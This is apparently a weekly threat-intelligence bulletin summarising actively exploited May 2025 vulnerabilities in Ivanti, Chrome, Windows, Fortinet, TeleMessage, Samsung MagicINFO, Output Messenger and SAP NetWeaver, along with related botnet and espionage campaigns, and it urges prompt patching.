This week’s threat landscape was defined by rapid exploitation of zero-day vulnerabilities in widely used enterprise platforms, spotlighting the critical need for proactive patch management and defense strategies. Seven new vulnerabilities were added to the CISA KEV catalog, with five zero-day flaws targeting Microsoft’s core components, enabling attackers to gain SYSTEM-level privileges. A high-profile issue in TeleMessage TM SGNL, a secure messaging platform used by former U.S. national security advisor Michael Waltz, exposed sensitive plaintext archives, causing significant privacy concerns. Fortinet also addressed a zero-day affecting multiple products amid active exploitation.  

Beyond these KEV additions, zero-day exploits were also actively observed in Google Chrome and Ivanti products, further emphasizing the expanding attack surface and the urgency of swift remediation.

Malicious botnet campaigns accelerated, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploiting vulnerabilities in Cloud Gateway, GitLab, and PHP-based services. At the same time, IoT malware such as Bashlite, BrickerBot, Tsunami, and Mirai intensified their focus on Eir D1000 modems, rapidly growing their botnet infrastructure.  

Espionage efforts by the Türkiye-linked group Marbled Dust focused on a zero-day in the Output Messenger app, enabling stealthy intrusions. Concurrently, the Mirai botnet leveraged a critical flaw in MagicINFO 9 Server, prompting Samsung’s urgent patch release. The ongoing exploitation of a key SAP NetWeaver vulnerability by multiple threat actors signals its growing allure across cybercrime and state-sponsored operations.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-4427
An Authentication Bypass Vulnerability in the API component of Ivanti Endpoint Manager Mobile (versions 12.5.0.0 and earlier) allows attackers to access protected resources without valid credentials. Exploiting this flaw, threat actors can potentially chain it with CVE-2025-4428 to execute arbitrary code on vulnerable devices without requiring authentication. Ivanti has addressed this critical issue by releasing patched versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1. Notably, this vulnerability has been actively exploited as a zero-day underscoring the urgency for immediate updates.

CVE-2025-4428
A Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile allows threat actors to run arbitrary code on targeted systems without prior authentication. This flaw becomes even more dangerous when chained with CVE-2025-4427, enabling attackers to fully compromise vulnerable devices. Ivanti has released security patches in versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1 to address the issue. Critically, the vulnerability has been exploited in the wild as a zero-day, highlighting the pressing need for organizations to apply the available fixes without delay.

CVE-2025-4664
An Insufficient Policy Enforcement Vulnerability has been discovered within Google Chrome's browser architecture, specifically affecting the Loader logic. This flaw allows attackers to bypass built-in security measures, potentially enabling unauthorized code execution or sandbox escape, posing significant risks to user security. The vulnerability was initially disclosed via an X post, suggesting that malicious actors may have been exploiting this weakness for an extended period before a patch was released. In response, Google promptly updated Chrome’s Stable channel to versions 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux, addressing the issue and urging users to update immediately.

CVE-2025-30397
A Type Confusion Vulnerability in the Windows Scripting Engine was addressed in Microsoft's May 2025 Patch Tuesday update. Assigned a high CVSS Score of 7.5, this flaw, rooted in the engine's improper handling of object types, can allow a remote unauthenticated attacker to execute arbitrary code over the network. To successfully exploit this vulnerability, a victim must be tricked into accessing a maliciously crafted URL using Microsoft Edge in Internet Explorer mode. The attack chain requires an authenticated user to interact with the malicious content, allowing an unauthenticated attacker to execute code remotely. Due to its real-world exploitation in the wild as zero-day and potential for remote code execution, it has been added to the CISA KEV catalog.

CVE-2025-30400
A Use-After-Free Vulnerability in the Windows Desktop Window Manager (DWM) Core Library has been identified and assigned a high CVSS score of 7.8. This flaw could allow an authenticated attacker to elevate privileges locally, potentially granting SYSTEM-level access. Microsoft addressed this vulnerability as part of the May 2025 Patch Tuesday release and confirmed that it had been exploited in the wild as a zero-day. Therefore, this vulnerability has been promptly listed in the CISA's Known Exploited Vulnerabilities (KEV) catalog, signaling an urgent call for administrators to apply patched without delay and strengthen their defenses.

CVE-2025-32756
A critical Stack-Based Buffer Overflow Vulnerability (CVSS 9.8) has been identified in several Fortinet products, including FortiFone, FortiVoice, FortiNDR and FortiMail. This flaw enables unauthenticated remote attackers to execute arbitrary code or commands by sending maliciously crafted HTTP requests. Fortinet has confirmed that this vulnerability is actively exploited in the wild as a zero-day, with FortiVoice appliances being a key target. Security patches have been issued for supported versions, while users of unsupported versions are advised to migrate to patched releases. The vulnerability's inclusion in the CISA KEV catalog underscores the urgency for immediate remediation.  

CVE-2025-32701
A Use-After-Free Vulnerability in the  Windows Common Log File System (CLFS) Driver was addressed by Microsoft in its May 2025 Patch Tuesday update. With a high CVSS score of 7.8, this flaw, if exploited successfully could allow an attacker to gain SYSTEM-level privileges, granting full control over the affected system. Notably, Microsoft has confirmed that this vulnerability was actively exploited as a zero-day prior to the patch release. Due to its critical nature and active abuse, it has also been added to the CISA KEV catalog, emphasizing the urgency for immediate remediation.

CVE-2025-32706
A Heap-Based Buffer Overflow Vulnerability in the Windows Common Log File System (CLFS) Driver, has been patched by Microsoft in its May 2025 Patch Tuesday release. With a high CVSS Score of 7.8, this flaw arises due to insufficient input validation and enables a local authenticated attacker to escalate privileges and achieve SYSTEM-level access. Its active exploitation as zero-day led to the rapid attention from the security teams and its subsequent inclusion in the CISA KEV catalog, signaling the need for immediate remediation across affected systems.

CVE-2025-32709
A Use-After-Free Vulnerability in the Windows Ancillary Function Driver for WinSock was patched by Microsoft in the May 2025 Patch Tuesday release. Assigned a high CVSS Score of 7.8, this flaw enabled local authenticated attacker to gain administrative privileges through improper memory handling. Given its active exploitation, it has been added to the CISA KEV catalog, emphasizing the urgency for organizations to apply security updates without delay.  

CVE-2025-47729
Hidden Functionality Vulnerability has been discovered in the TeleMessage TM SGNL, where the archiving backend stores cleartext copies of user messages, significantly compromising data confidentiality. TeleMessage, a secure messaging platform previously used by high-profile individuals such as former U.S. National Security Advisor Mike Waltz, was exploited by threat actors to access sensitive data. The breach exposed private Telegram communications from Coinbase, a major cryptocurrency company, and a confidential list of hundreds of U.S. Customs and Border Protection employees. Due to the severity and real-world exploitation of this flaw, it has been added to the CISA KEV catalog, reinforcing the need for immediate mitigation and review of archival practices.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-4632
Samsung has released a critical security update to address CVE-2025-4632, path traversal vulnerability in MagicINFO 9 server that has been actively exploited as a zero-day. Acting as a patch bypass for the previously addressed CVE-2024-7399, this flaw came to light after SSD Disclosure published a proof-of-concept (PoC) on April 30,2025, leading to in-the-wild exploitation, including instances where the Mirai botnet was deployed. Initially thought to be related to the older CVE-2024-7399, further investigation by cybersecurity firm Huntress revealed that even fully updated MagicINFO 9 server instances (version 21.1050) were being compromised. Their analysis confirmed CVE-2025-4632 as the root cause, documenting three incidents in which unidentified actors used identical command sequences to download payloads like srvany.exe and services.exe, and perform reconnaissance, highlighting the critical need for immediate patching and defensive hardening.

CVE-2025-27920
Microsoft has reported that since April 2024, the Türkiye-affiliated espionage group known as Marbled Dust has been actively exploiting CVE-2025-27920 as a zero-day vulnerability in Output Messenger, a cross-platform messaging application. This previously unknown flaw enabled the attackers to gain initial access to unpatched systems and deploy a malicious VBS-based backdoor (OMServerService.vbs) to the startup folder, granting persistent control. The campaign primarily targeted individuals associated with the Kurdish military in Iraq, aligning with the Marbled Dust's historic focus on government and telecom sectors across the Middle East and Europe.  

Once the system was compromised, a secondary Go-based payload (OMClientService.exe) was silently extracted to carry out system fingerprinting, command execution via Windows Command shell, and beaconing to command-and-control infrastructure. The attackers also leveraged Plink, a PuTTY SSH client, to establish outbound tunnels for data exfiltration. Microsoft attributes this sophisticated campaign with high confidence to Marbled Dust, noting its overlap with other threat clusters such as Sea Turtle and UNC1326.

CVE-2025-31324
Multiple threat actors are now actively exploiting CVE-2025-31324, a critical vulnerability in SAP NetWeaver, underscoring its growing appeal across both cybercriminal and state-sponsored landscapes. According to ReliaQuest, the flaw has been leveraged by the BianLian extortion gang and the RansomExx ransomware operators (tracked by Microsoft as Storm-2460), signaling widespread criminal interest. In a separate campaign, attackers deployed a plugin-based trojan named PipeMagic via web shells after exploiting the same vulnerability, highlighting its versatility in post-exploitation scenarios. Meanwhile, EclecticIQ reports that China-linked groups UNC5221, UNC5174, and CL-STA-0048 are also abusing the flaw to deliver custom payloads, further intensifying the threat landscape around SAP NetWeaver.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/05/13/cisa-adds-five-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/05/14/cisa-adds-one-known-exploited-vulnerability-catalog  
3. https://www.cisa.gov/news-events/alerts/2025/05/06/cisa-adds-one-known-exploited-vulnerability-catalog
4. https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/  
5. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures  
6. https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/  
7. https://chromereleases.googleblog.com/2025/05/stable-channel-update-for-desktop_14.html  
8. https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?